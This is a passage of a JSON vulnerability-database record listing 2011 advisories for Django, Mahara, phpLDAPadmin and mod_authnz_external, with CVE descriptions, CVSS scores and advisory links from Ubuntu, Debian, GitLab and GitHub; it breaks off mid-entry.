"cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-08-04T14:31:51", "description": "The get_dataroot_image_path function in lib/file.php in Mahara before 1.4.1\ndoes not properly validate uploaded image files, which allows remote\nattackers to cause a denial of service (memory consumption) via a (1) large\nor (2) invalid image.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2772", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2772"], "modified": "2011-11-15T00:00:00", "id": "UB:CVE-2011-2772", "href": "https://ubuntu.com/security/CVE-2011-2772", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:32:05", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host\nheader to construct a full URL in certain circumstances, which allows\nremote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4139", "href": "https://ubuntu.com/security/CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:32:05", "description": "The verify_exists functionality in the URLField implementation in Django\nbefore 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity\nthrough a HEAD request, but then uses a GET request for the new target URL\nin the case of a redirect, which might allow remote attackers to trigger\narbitrary GET requests with an unintended source IP address via a crafted\nLocation header.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4138", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4138", "href": "https://ubuntu.com/security/CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:31:57", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x\nbefore 1.2.2 allows remote attackers to inject arbitrary web script or HTML\nvia an _debug command.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/precise/+source/phpldapadmin/+bug/887290>\n", "cvss3": {}, "published": "2011-11-02T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4074", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": "2011-11-02T00:00:00", "id": "UB:CVE-2011-4074", "href": "https://ubuntu.com/security/CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:32:05", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when\nsession data is stored in the cache, uses the root namespace for both\nsession identifiers and application-data keys, which allows remote\nattackers to modify a session by triggering use of a key that is equal to\nthat session's identifier.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4136", "href": "https://ubuntu.com/security/CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-08-04T14:31:57", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2\nallows remote attackers to execute arbitrary PHP code via the orderby\nparameter (aka sortby variable) in a query_engine action to cmd.php, as\nexploited in the wild in October 2011.\n\n#### Bugs\n\n * [http://sourceforge.net/tracker/index.php?func=detail&aid=3417184&group_id=61828&atid=498546](<http://sourceforge.net/tracker/index.php?func=detail&aid=3417184&group_id=61828&atid=498546>)\n * <https://bugs.launchpad.net/ubuntu/precise/+source/phpldapadmin/+bug/887290>\n", "cvss3": {}, "published": "2011-11-02T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4075", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2011-11-02T00:00:00", "id": "UB:CVE-2011-4075", "href": "https://ubuntu.com/security/CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:32:58", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the\nmod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server\nallows remote attackers to execute arbitrary SQL commands via the user\nfield.", "cvss3": {}, "published": "2011-07-28T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2688", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-28T00:00:00", "id": "UB:CVE-2011-2688", "href": "https://ubuntu.com/security/CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:31:51", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.4.1\nallow remote attackers to inject arbitrary web script or HTML via vectors\nrelated to (1) URI attributes and (2) the External Feed component, as\ndemonstrated by the guid element in an RSS feed.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2771", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771"], "modified": "2011-11-15T00:00:00", "id": "UB:CVE-2011-2771", "href": "https://ubuntu.com/security/CVE-2011-2771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:31:50", "description": "Cross-site request forgery (CSRF) vulnerability in Mahara before 1.4.1\nallows remote attackers to hijack the authentication of administrators for\nrequests that add a user to an institution.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2773"], "modified": "2011-11-15T00:00:00", "id": "UB:CVE-2011-2773", "href": "https://ubuntu.com/security/CVE-2011-2773", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:32:05", "description": "The verify_exists functionality in the URLField implementation in Django\nbefore 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt\naccess to an arbitrary URL with no timeout, which allows remote attackers\nto cause a denial of service (resource consumption) via a URL associated\nwith (1) a slow response, (2) a completed TCP connection with no\napplication data sent, or (3) a large amount of application data, a related\nissue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4137", "href": "https://ubuntu.com/security/CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2022-08-06T06:08:03", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4139", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-06T06:08:03", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4138", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4138", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-04T06:01:38", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "debiancve", "title": "CVE-2011-4074", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": "2011-11-02T17:55:00", "id": "DEBIANCVE:CVE-2011-4074", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-06T06:08:03", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4140", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4140", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4140", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T06:08:03", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4136", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-04T06:01:38", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to execute arbitrary PHP code via the orderby parameter (aka sortby variable) in a query_engine action to cmd.php, as exploited in the wild in October 2011.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "debiancve", "title": "CVE-2011-4075", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2011-11-02T17:55:00", "id": "DEBIANCVE:CVE-2011-4075", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:00:07", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.", "cvss3": {}, "published": "2011-07-28T18:55:00", "type": "debiancve", "title": "CVE-2011-2688", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-28T18:55:00", "id": "DEBIANCVE:CVE-2011-2688", "href": "https://security-tracker.debian.org/tracker/CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T06:08:03", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4137", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gitlab": [{"lastseen": "2022-06-09T23:10:08", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "gitlab", "title": "Cross-Site Request Forgery ", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2018-07-23T00:00:00", "id": "GITLAB-54E6DBECADBD0312F52CA4C8814A13A8", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/pypi%2FDjango%2FCVE-2011-4140.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:10:05", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "gitlab", "title": "Improper Input Validation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2018-07-23T00:00:00", "id": "GITLAB-1F2A6444243200478C1558882DA19AE9", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/pypi%2FDjango%2FCVE-2011-4136.yml/raw", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-06-09T23:10:06", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service a slow response, a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "gitlab", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2018-07-23T00:00:00", "id": "GITLAB-F8870E91AA55D92266BA9DAF7EC7E29A", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/pypi%2FDjango%2FCVE-2011-4137.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "github": [{"lastseen": "2022-05-13T12:33:35", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2018-07-23T19:51:19", "type": "github", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2021-09-14T17:15:59", "id": "GHSA-H95J-H2RV-QRG4", "href": "https://github.com/advisories/GHSA-h95j-h2rv-qrg4", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T12:33:35", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2018-07-23T19:52:39", "type": "github", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2021-09-21T22:24:48", "id": "GHSA-X88J-93VC-WPMP", "href": "https://github.com/advisories/GHSA-x88j-93vc-wpmp", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-05-13T12:33:35", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2018-07-23T19:51:35", "type": "github", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2021-08-31T21:11:03", "id": "GHSA-3JQW-CRQJ-W8QW", "href": "https://github.com/advisories/GHSA-3jqw-crqj-w8qw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in phpLDAPadmin query_engine\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-01-29T00:00:00", "type": "dsquare", "title": "phpLDAPadmin 1.2.1.1 